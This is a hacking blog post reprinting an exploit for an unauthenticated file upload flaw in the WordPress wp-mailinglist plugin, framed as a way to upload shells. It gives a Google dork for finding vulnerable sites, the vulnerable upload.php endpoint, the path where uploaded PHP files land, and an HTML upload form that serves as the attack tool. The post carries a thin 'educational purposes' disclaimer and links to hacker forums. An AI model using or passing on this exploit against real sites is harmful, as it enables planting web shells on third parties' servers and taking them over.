EXPLOIT WORDPRESS UPLOAD SHELL 2018 - 04 Day

04day is totally for educational purposes and did not encourage unethical hacking

Breaking

Monday, October 2, 2017

EXPLOIT WORDPRESS UPLOAD SHELL 2018

#################################################################################
# Exploit Title   : Wordpress plugins wp-mailinglist upload File Vulnerability | CSRF
# Author            : Fadi Tnx
# Google Dork  : inurl:/wp-content/plugins/wp-mailinglist/
# Tested on        : Linux
# data                : 2017-09-21
# Blog               : http://www.03day.ga
#################################################################################
#
#
# if msg  : No file data was posted An existing vulnerability
#
# [!] Exploit : 127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
#
# [!] File Location : http:/127.0.0.1/path/wp-content/uploads/wp-mailinglist/FILE_NAME.php

#################################################################################
#CSRF:
#################################################################################
<html>
<body>
<form action="127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
#################################################################################
# ABOUT
# Facebook  : https://www.facebook.com/Fallagahacker.Tn/
# forum     : http://spyhackerz.com/forum/
# Blog      : http://www.03day.ga/
#################################################################################

No comments:

Post a Comment

Post Top Ad